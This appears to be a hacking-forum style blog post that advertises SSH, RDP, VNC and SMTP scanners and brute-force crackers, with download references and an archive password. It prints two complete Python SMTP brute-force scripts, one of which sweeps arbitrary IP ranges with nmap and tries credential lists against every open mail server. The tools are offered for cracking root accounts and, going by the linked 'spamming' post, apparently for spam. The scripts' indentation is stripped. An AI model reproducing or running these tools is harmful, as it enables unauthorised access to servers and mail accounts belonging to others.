SSH - RDP - SMTP - Scanners Crackers And Checkers By Hack2Wwworld

1 :- SSH Scanner - Still Working and i use for cracking Root SSH 


2 :- RDP Scanner Working Good



3 :- RDP Scanner Still Working Good 


Scan All Type Ip Ranges



4 :- Lazzy SSH Scanner Working 100% And Best Scanner For Roots 



Buy New Version just 2$ for unlimited threads 


Site :- http://phamblog.com/ 

5 :- Sanmao SMTP Scanner Working 100% and Good Scanner


6 :- Fast RDP Brute Shiti Scanner But Good For Scanning IP Ranges



7 :- RDP Brute Old Scanner But Still Working and Good For IP Ranges




DOWNLOAD LINK ALL SCANNERS


Code:
RAR Password :- lxiuiwekleweiisooweem28849030923790932nuc3743nc8xeuihdc

8 :- XRay Scanner Good For All Type IP Ranges ( FTP RDP SMTPS And Others )


9 :- VNC Scanner Dont Know Still Working YES OR NOT 


10 :- SMTP Verifyr Still Working and good For Check Bulk SMTPS




SMTP Verifier DOWNLOAD LINK

Python SMTP Scanner

#!usr/bin/python
#Smtp Brute Forcer
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, smtplib, socket
from smtplib import SMTP
from copy import copy

if len(sys.argv) !=4:
print "Usage: ./smtpbrute.py <server> <userlist> <wordlist>"
sys.exit(1)
try:
helo = smtplib.SMTP(sys.argv[1])
name = helo.helo()
helo.quit()
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
name = "Server doesn't support the Helo cmd"

try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)

try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)

print "\n\t d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Helo message:",name,"\n"

wordlist = copy(words)

def reloader():
for word in wordlist:
words.append(word)

def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])

else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])

lock.release()
return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
smtp = smtplib.SMTP(sys.argv[1])
smtp.login(user, value)
print "\t\nLogin successful:",user, value
smtp.quit()
work.join()
sys.exit(2)
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
#print "An error occurred:", msg
pass

for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)


Smtp Brute Forcer, searches ip_range for hosts using smtp - Python


USE :- ./smtpbrute_iprange.py 255.*.*.* user.txt pass.txt

#!usr/bin/python
#Smtp Brute Forcer, searches ip_range for hosts using smtp.
#d3hydr8[at]gmail[dot]com

import threading, time, StringIO, commands, random, sys, smtplib, re, socket
from smtplib import SMTP
from copy import copy

if len(sys.argv) !=4:
print "Usage: ./smtpbrute_iprange.py <ip_range> <userlist> <wordlist>"
sys.exit(1)

try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)

try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)

print "\n\t d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)

wordlist = copy(words)

def scan():

iprange = sys.argv[1]
ip_list = []

nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25 | grep open -B 3')[1]).readlines()

for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
ip_list.append(ipaddr[0])
return ip_list

def reloader():
for word in wordlist:
words.append(word)

def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])

else:
reloader()
value = random.sample(words, 1)

lock.release()
return value[0][:-1]

class Workhorse(threading.Thread):

def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
smtp = smtplib.SMTP(ip)
smtp.login(user[:-1], value)
print "\t\nLogin successful:",user, value
smtp.quit()
work.join()
sys.exit(2)
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
#print "An error occurred:", msg
pass

ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
print "\n\tAttempting BruteForce:",ip,"\n"
try:
helo = smtplib.SMTP(ip)
print helo.helo(), "\n"
helo.quit()
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
print "Server doesn't support the Helo cmd"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)


Comments

Popular posts from this blog

Spamming Spam Classes For Newbie By Hack2World Admin